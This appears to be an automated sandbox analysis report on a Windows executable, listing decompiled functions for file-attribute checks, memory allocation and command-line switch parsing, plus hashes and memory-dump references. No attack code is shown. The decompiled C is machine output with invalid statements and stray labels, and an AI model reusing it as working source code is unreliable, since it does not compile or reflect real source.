• API String ID: 2591292051-0
• Opcode ID: 7fdb12b819bb63f41c64c9d93e75d09c0d5672c0af3b4f1d4e675034b58d296f
• Instruction ID: 32fbcabfab6df4a1bd217b3cc2e6d09af0d50c2d8960f2accc7e728d52a822ed
• Opcode Fuzzy Hash: 7fdb12b819bb63f41c64c9d93e75d09c0d5672c0af3b4f1d4e675034b58d296f
• Instruction Fuzzy Hash: A4F01271508B089FC7719FB9CC40652BBE4BB993653100B2E95EED21D4EBF0A861DB90
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E001066AE(CHAR* __ecx) {
    unsigned int _t1;

    _t1 = GetFileAttributesA(__ecx); // executed
    if(_t1 != 0xffffffff) {
        return  !(_t1 >> 4) & 0x00000001;
    } else {
        return 0;
    }
}





                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(?,00104777,?,00104E38,?), ref: 001066B1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                • Opcode ID: 670795cfdf5bbaf4e93a00e4ab57ccc0fa96b841accf776e8c7f2a009dba973c
                                                                                                                                                                                                                                                • Instruction ID: f3be086b5e94d5d6f4670691f74825e2a5a69eda1da3f4eab5d8a6e3b41e334a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 670795cfdf5bbaf4e93a00e4ab57ccc0fa96b841accf776e8c7f2a009dba973c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DFB0927662254442AA2006316C2955A2841BBC123A7E42B90F072C05E4CBBEC896D004
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00104CA0(long _a4) {
                                                                                                                                                                                                                                                				void* _t2;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                                                                				return _t2;
                                                                                                                                                                                                                                                			}




                                                                                                                                                                                                                                                0x00104caa
                                                                                                                                                                                                                                                0x00104cb1

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000000,?), ref: 00104CAA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocGlobal
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3761449716-0
                                                                                                                                                                                                                                                • Opcode ID: a92f79489f9e227b35420181303d4c47a5815fee715862eb02836c9c19cadbaf
                                                                                                                                                                                                                                                • Instruction ID: 5f4f194a7177ba4a962a12a0efb21473a0c8172ba8e58352f70b77963e8f98b8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a92f79489f9e227b35420181303d4c47a5815fee715862eb02836c9c19cadbaf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2B0123204430CB7CF001FC2EC09F853F1DEBC4761F540000F64C45450CAB294508696
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00104CC0(void* _a4) {
                                                                                                                                                                                                                                                				void* _t2;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                                                                				return _t2;
                                                                                                                                                                                                                                                			}




                                                                                                                                                                                                                                                0x00104cc8
                                                                                                                                                                                                                                                0x00104ccf

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeGlobal
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2979337801-0
                                                                                                                                                                                                                                                • Opcode ID: bfd54c1cee485fa80659a176c49ee967936bedff14e6bb384563428cf1f2ed12
                                                                                                                                                                                                                                                • Instruction ID: e5d97c236f7f6c29249ef74c3b5a17a5e9d115ac68f7e8bd722e4d41f80669b7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bfd54c1cee485fa80659a176c49ee967936bedff14e6bb384563428cf1f2ed12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98B0123100020CB7CF001B42EC088453F1DDBC02607400010F54C41421CB7398518585
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                                                                                                                			E00105C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                                                				CHAR* _v265;
                                                                                                                                                                                                                                                				char _v266;
                                                                                                                                                                                                                                                				char _v267;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				CHAR* _v272;
                                                                                                                                                                                                                                                				char _v276;
                                                                                                                                                                                                                                                				signed int _v296;
                                                                                                                                                                                                                                                				char _v556;
                                                                                                                                                                                                                                                				signed int _t61;
                                                                                                                                                                                                                                                				int _t63;
                                                                                                                                                                                                                                                				char _t67;
                                                                                                                                                                                                                                                				CHAR* _t69;
                                                                                                                                                                                                                                                				signed int _t71;
                                                                                                                                                                                                                                                				void* _t75;
                                                                                                                                                                                                                                                				char _t79;
                                                                                                                                                                                                                                                				void* _t83;
                                                                                                                                                                                                                                                				void* _t85;
                                                                                                                                                                                                                                                				void* _t87;
                                                                                                                                                                                                                                                				intOrPtr _t88;
                                                                                                                                                                                                                                                				void* _t100;
                                                                                                                                                                                                                                                				intOrPtr _t101;
                                                                                                                                                                                                                                                				CHAR* _t104;
                                                                                                                                                                                                                                                				intOrPtr _t105;
                                                                                                                                                                                                                                                				void* _t111;
                                                                                                                                                                                                                                                				void* _t115;
                                                                                                                                                                                                                                                				CHAR* _t118;
                                                                                                                                                                                                                                                				void* _t119;
                                                                                                                                                                                                                                                				void* _t127;
                                                                                                                                                                                                                                                				CHAR* _t129;
                                                                                                                                                                                                                                                				void* _t132;
                                                                                                                                                                                                                                                				void* _t142;
                                                                                                                                                                                                                                                				signed int _t143;
                                                                                                                                                                                                                                                				CHAR* _t144;
                                                                                                                                                                                                                                                				void* _t145;
                                                                                                                                                                                                                                                				void* _t146;
                                                                                                                                                                                                                                                				void* _t147;
                                                                                                                                                                                                                                                				void* _t149;
                                                                                                                                                                                                                                                				char _t155;
                                                                                                                                                                                                                                                				void* _t157;
                                                                                                                                                                                                                                                				void* _t162;
                                                                                                                                                                                                                                                				void* _t163;
                                                                                                                                                                                                                                                				char _t167;
                                                                                                                                                                                                                                                				char _t170;
                                                                                                                                                                                                                                                				CHAR* _t173;
                                                                                                                                                                                                                                                				void* _t177;
                                                                                                                                                                                                                                                				intOrPtr* _t183;
                                                                                                                                                                                                                                                				intOrPtr* _t192;
                                                                                                                                                                                                                                                				CHAR* _t199;
                                                                                                                                                                                                                                                				void* _t200;
                                                                                                                                                                                                                                                				CHAR* _t201;
                                                                                                                                                                                                                                                				void* _t205;
                                                                                                                                                                                                                                                				void* _t206;
                                                                                                                                                                                                                                                				int _t209;
                                                                                                                                                                                                                                                				void* _t210;
                                                                                                                                                                                                                                                				void* _t212;
                                                                                                                                                                                                                                                				void* _t213;
                                                                                                                                                                                                                                                				CHAR* _t218;
                                                                                                                                                                                                                                                				intOrPtr* _t219;
                                                                                                                                                                                                                                                				intOrPtr* _t220;
                                                                                                                                                                                                                                                				signed int _t221;
                                                                                                                                                                                                                                                				signed int _t223;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t173 = __ecx;
                                                                                                                                                                                                                                                				_t61 =  *0x108004; // 0xb5a2e1bc
                                                                                                                                                                                                                                                				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                                                                				_push(__ebx);
                                                                                                                                                                                                                                                				_push(__esi);
                                                                                                                                                                                                                                                				_push(__edi);
                                                                                                                                                                                                                                                				_t209 = 1;
                                                                                                                                                                                                                                                				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                                                                					_t63 = 1;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					L2:
                                                                                                                                                                                                                                                					while(_t209 != 0) {
                                                                                                                                                                                                                                                						_t67 =  *_t173;
                                                                                                                                                                                                                                                						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                                                                							_t173 = CharNextA(_t173);
                                                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_v272 = _t173;
                                                                                                                                                                                                                                                						if(_t67 == 0) {
                                                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t69 = _v272;
                                                                                                                                                                                                                                                							_t177 = 0;
                                                                                                                                                                                                                                                							_t213 = 0;
                                                                                                                                                                                                                                                							_t163 = 0;
                                                                                                                                                                                                                                                							_t202 = 1;
                                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                                								if(_t213 != 0) {
                                                                                                                                                                                                                                                									if(_t163 != 0) {
                                                                                                                                                                                                                                                										break;
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										goto L21;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_t69 =  *_t69;
                                                                                                                                                                                                                                                									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                                                                										break;
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										_t69 = _v272;
                                                                                                                                                                                                                                                										L21:
                                                                                                                                                                                                                                                										_t155 =  *_t69;
                                                                                                                                                                                                                                                										if(_t155 != 0x22) {
                                                                                                                                                                                                                                                											if(_t202 >= 0x104) {
                                                                                                                                                                                                                                                												goto L106;
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                                                                												_t177 = _t177 + 1;
                                                                                                                                                                                                                                                												_t202 = _t202 + 1;
                                                                                                                                                                                                                                                												_t157 = 1;
                                                                                                                                                                                                                                                												goto L30;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											if(_v272[1] == 0x22) {
                                                                                                                                                                                                                                                												if(_t202 >= 0x104) {
                                                                                                                                                                                                                                                													L106:
                                                                                                                                                                                                                                                													_t63 = 0;
                                                                                                                                                                                                                                                													L125:
                                                                                                                                                                                                                                                													_pop(_t210);
                                                                                                                                                                                                                                                													_pop(_t212);
                                                                                                                                                                                                                                                													_pop(_t162);
                                                                                                                                                                                                                                                													return E00106CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                                                                													_t177 = _t177 + 1;
                                                                                                                                                                                                                                                													_t202 = _t202 + 1;
                                                                                                                                                                                                                                                													_t157 = 2;
                                                                                                                                                                                                                                                													goto L30;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												_t157 = 1;
                                                                                                                                                                                                                                                												if(_t213 != 0) {
                                                                                                                                                                                                                                                													_t163 = 1;
                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                													_t213 = 1;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												goto L30;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								goto L131;
                                                                                                                                                                                                                                                								L30:
                                                                                                                                                                                                                                                								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                                                                								_t69 = _v272;
                                                                                                                                                                                                                                                							} while ( *_t69 != 0);
                                                                                                                                                                                                                                                							if(_t177 >= 0x104) {
                                                                                                                                                                                                                                                								E00106E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                                                                								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0x108004; // 0xb5a2e1bc
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E0010597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E001044B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0x109124 = E00106285();
									_t75 = 0;
								}
								return E00106CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E001044B9(0, 0x521, 0x101140, 0, 0x40, 0);
												_t85 =  *0x108588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E0010667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E0010667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E00105C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E00101680(0x108c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E0010667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E0010667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0x108a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00105C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x108b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x108a3a;
																}
																E00101680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E0010658A(_t218, 0x104, 0x101140);
																if(E001031E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
                                                                                                                                                                                                                                                															if(_v266 != 0x3a) {
                                                                                                                                                                                                                                                																goto L49;
                                                                                                                                                                                                                                                															} else {
                                                                                                                                                                                                                                                																_t199 = _v265;
                                                                                                                                                                                                                                                																if(_t199 != 0) {
                                                                                                                                                                                                                                                																	_t219 =  &_v265;
                                                                                                                                                                                                                                                																	do {
                                                                                                                                                                                                                                                																		_t219 = _t219 + 1;
                                                                                                                                                                                                                                                																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                                                                																		if(_t115 == 0) {
                                                                                                                                                                                                                                                																			 *0x108a2c = 1;
                                                                                                                                                                                                                                                																		} else {
                                                                                                                                                                                                                                                																			_t200 = 2;
                                                                                                                                                                                                                                                																			_t119 = _t115 - _t200;
                                                                                                                                                                                                                                                																			if(_t119 == 0) {
                                                                                                                                                                                                                                                																				 *0x108a30 = 1;
                                                                                                                                                                                                                                                																			} else {
                                                                                                                                                                                                                                                																				if(_t119 == 0xf) {
                                                                                                                                                                                                                                                																					 *0x108a34 = 1;
                                                                                                                                                                                                                                                																				} else {
                                                                                                                                                                                                                                                																					_t209 = 0;
                                                                                                                                                                                                                                                																				}
                                                                                                                                                                                                                                                																			}
                                                                                                                                                                                                                                                																		}
                                                                                                                                                                                                                                                																		_t118 =  *_t219;
                                                                                                                                                                                                                                                																		_t199 = _t118;
                                                                                                                                                                                                                                                																	} while (_t118 != 0);
                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                                														} else {
                                                                                                                                                                                                                                                															 *0x108a2c = 1;
                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                														goto L50;
                                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                                														_t127 = _t111 - 3;
                                                                                                                                                                                                                                                														if(_t127 == 0) {
                                                                                                                                                                                                                                                															if(_v266 != 0) {
                                                                                                                                                                                                                                                																if(_v266 != 0x3a) {
                                                                                                                                                                                                                                                																	goto L49;
                                                                                                                                                                                                                                                																} else {
                                                                                                                                                                                                                                                																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                                                                																	if(_t129 == 0x31) {
                                                                                                                                                                                                                                                																		goto L76;
                                                                                                                                                                                                                                                																	} else {
                                                                                                                                                                                                                                                																		if(_t129 == 0x41) {
                                                                                                                                                                                                                                                																			goto L83;
                                                                                                                                                                                                                                                																		} else {
                                                                                                                                                                                                                                                																			if(_t129 == 0x55) {
                                                                                                                                                                                                                                                																				goto L76;
                                                                                                                                                                                                                                                																			} else {
                                                                                                                                                                                                                                                																				goto L49;
                                                                                                                                                                                                                                                																			}
                                                                                                                                                                                                                                                																		}
                                                                                                                                                                                                                                                																	}
                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                															} else {
                                                                                                                                                                                                                                                																L76:
                                                                                                                                                                                                                                                																_push(2);
                                                                                                                                                                                                                                                																_pop(1);
                                                                                                                                                                                                                                                																L83:
                                                                                                                                                                                                                                                																 *0x108a38 = 1;
                                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                                															goto L50;
                                                                                                                                                                                                                                                														} else {
                                                                                                                                                                                                                                                															_t132 = _t127 - 1;
                                                                                                                                                                                                                                                															if(_t132 == 0) {
                                                                                                                                                                                                                                                																if(_v266 != 0) {
                                                                                                                                                                                                                                                																	if(_v266 != 0x3a) {
                                                                                                                                                                                                                                                																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                                                                																			goto L49;
                                                                                                                                                                                                                                                																		}
                                                                                                                                                                                                                                                																	} else {
                                                                                                                                                                                                                                                																		_t201 = _v265;
                                                                                                                                                                                                                                                																		 *0x109a2c = 1;
                                                                                                                                                                                                                                                																		if(_t201 != 0) {
                                                                                                                                                                                                                                                																			_t220 =  &_v265;
                                                                                                                                                                                                                                                																			do {
                                                                                                                                                                                                                                                																				_t220 = _t220 + 1;
                                                                                                                                                                                                                                                																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                                                                																				if(_t142 == 0) {
                                                                                                                                                                                                                                                																					_t143 = 2;
                                                                                                                                                                                                                                                																					 *0x109a2c =  *0x109a2c | _t143;
                                                                                                                                                                                                                                                																					goto L70;
                                                                                                                                                                                                                                                																				} else {
                                                                                                                                                                                                                                                																					_t145 = _t142 - 3;
                                                                                                                                                                                                                                                																					if(_t145 == 0) {
                                                                                                                                                                                                                                                																						 *0x108d48 =  *0x108d48 | 0x00000040;
                                                                                                                                                                                                                                                																					} else {
                                                                                                                                                                                                                                                																						_t146 = _t145 - 5;
                                                                                                                                                                                                                                                																						if(_t146 == 0) {
                                                                                                                                                                                                                                                																							 *0x109a2c =  *0x109a2c & 0xfffffffd;
                                                                                                                                                                                                                                                																							goto L70;
                                                                                                                                                                                                                                                																						} else {
                                                                                                                                                                                                                                                																							_t147 = _t146 - 5;
                                                                                                                                                                                                                                                																							if(_t147 == 0) {
                                                                                                                                                                                                                                                																								 *0x109a2c =  *0x109a2c & 0xfffffffe;
                                                                                                                                                                                                                                                																								goto L70;
                                                                                                                                                                                                                                                																							} else {
                                                                                                                                                                                                                                                																								_t149 = _t147;
                                                                                                                                                                                                                                                																								if(_t149 == 0) {
                                                                                                                                                                                                                                                																									 *0x108d48 =  *0x108d48 | 0x00000080;
                                                                                                                                                                                                                                                																								} else {
                                                                                                                                                                                                                                                																									if(_t149 == 3) {
                                                                                                                                                                                                                                                																										 *0x109a2c =  *0x109a2c | 0x00000004;
                                                                                                                                                                                                                                                																										L70:
                                                                                                                                                                                                                                                																										 *0x108a28 = 1;
                                                                                                                                                                                                                                                																									} else {
                                                                                                                                                                                                                                                																										_t209 = 0;
                                                                                                                                                                                                                                                																									}
                                                                                                                                                                                                                                                																								}
                                                                                                                                                                                                                                                																							}
                                                                                                                                                                                                                                                																						}
                                                                                                                                                                                                                                                																					}
                                                                                                                                                                                                                                                																				}
                                                                                                                                                                                                                                                																				_t144 =  *_t220;
                                                                                                                                                                                                                                                																				_t201 = _t144;
                                                                                                                                                                                                                                                																			} while (_t144 != 0);
                                                                                                                                                                                                                                                																		}
                                                                                                                                                                                                                                                																	}
                                                                                                                                                                                                                                                																} else {
                                                                                                                                                                                                                                                																	 *0x109a2c = 3;
                                                                                                                                                                                                                                                																	 *0x108a28 = 1;
                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                																goto L50;
                                                                                                                                                                                                                                                															} else {
                                                                                                                                                                                                                                                																if(_t132 == 0) {
                                                                                                                                                                                                                                                																	goto L98;
                                                                                                                                                                                                                                                																} else {
                                                                                                                                                                                                                                                																	L49:
                                                                                                                                                                                                                                                																	_t209 = 0;
                                                                                                                                                                                                                                                																	L50:
                                                                                                                                                                                                                                                																	_t173 = _v272;
                                                                                                                                                                                                                                                																	if( *_t173 != 0) {
                                                                                                                                                                                                                                                																		goto L2;
                                                                                                                                                                                                                                                																	} else {
                                                                                                                                                                                                                                                																		break;
                                                                                                                                                                                                                                                																	}
                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											goto L106;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										L34:
                                                                                                                                                                                                                                                										_t209 = 0;
                                                                                                                                                                                                                                                										break;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						goto L131;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if( *0x108a2c != 0 &&  *0x108b3e == 0) {
                                                                                                                                                                                                                                                						if(GetModuleFileNameA( *0x109a3c, 0x108b3e, 0x104) == 0) {
                                                                                                                                                                                                                                                							_t209 = 0;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t202 = 0x5c;
                                                                                                                                                                                                                                                							 *((char*)(E001066C8(0x108b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t63 = _t209;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				L131:
                                                                                                                                                                                                                                                			}


































































                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105d62
                                                                                                                                                                                                                                                0x00105d5b
                                                                                                                                                                                                                                                0x00105d4f
                                                                                                                                                                                                                                                0x00105d1d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105d9f
                                                                                                                                                                                                                                                0x00105d9f
                                                                                                                                                                                                                                                0x00105da5
                                                                                                                                                                                                                                                0x00105dab
                                                                                                                                                                                                                                                0x00105dba
                                                                                                                                                                                                                                                0x00106218
                                                                                                                                                                                                                                                0x0010621d
                                                                                                                                                                                                                                                0x00106220
                                                                                                                                                                                                                                                0x00106221
                                                                                                                                                                                                                                                0x00106229
                                                                                                                                                                                                                                                0x00106230
                                                                                                                                                                                                                                                0x00106247
                                                                                                                                                                                                                                                0x0010626a
                                                                                                                                                                                                                                                0x00106272
                                                                                                                                                                                                                                                0x00106249
                                                                                                                                                                                                                                                0x00106255
                                                                                                                                                                                                                                                0x0010625f
                                                                                                                                                                                                                                                0x00106264
                                                                                                                                                                                                                                                0x00106264
                                                                                                                                                                                                                                                0x00106284
                                                                                                                                                                                                                                                0x00105dc0
                                                                                                                                                                                                                                                0x00105dc0
                                                                                                                                                                                                                                                0x00105dca
                                                                                                                                                                                                                                                0x00105e22
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105dcc
                                                                                                                                                                                                                                                0x00105dce
                                                                                                                                                                                                                                                0x00105e24
                                                                                                                                                                                                                                                0x00105e24
                                                                                                                                                                                                                                                0x00105e2c
                                                                                                                                                                                                                                                0x00105e47
                                                                                                                                                                                                                                                0x00105e4a
                                                                                                                                                                                                                                                0x001061d2
                                                                                                                                                                                                                                                0x001061e2
                                                                                                                                                                                                                                                0x001061e7
                                                                                                                                                                                                                                                0x001061ee
                                                                                                                                                                                                                                                0x001061f1
                                                                                                                                                                                                                                                0x001061f1
                                                                                                                                                                                                                                                0x001061f8
                                                                                                                                                                                                                                                0x001061f8
                                                                                                                                                                                                                                                0x00105e50
                                                                                                                                                                                                                                                0x00105e53
                                                                                                                                                                                                                                                0x00106109
                                                                                                                                                                                                                                                0x0010611f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00106125
                                                                                                                                                                                                                                                0x00106137
                                                                                                                                                                                                                                                0x0010613a
                                                                                                                                                                                                                                                0x0010613c
                                                                                                                                                                                                                                                0x0010613e
                                                                                                                                                                                                                                                0x0010613e
                                                                                                                                                                                                                                                0x00106141
                                                                                                                                                                                                                                                0x00106141
                                                                                                                                                                                                                                                0x00106143
                                                                                                                                                                                                                                                0x00106144
                                                                                                                                                                                                                                                0x0010614a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00106150
                                                                                                                                                                                                                                                0x00106152
                                                                                                                                                                                                                                                0x0010615c
                                                                                                                                                                                                                                                0x00106170
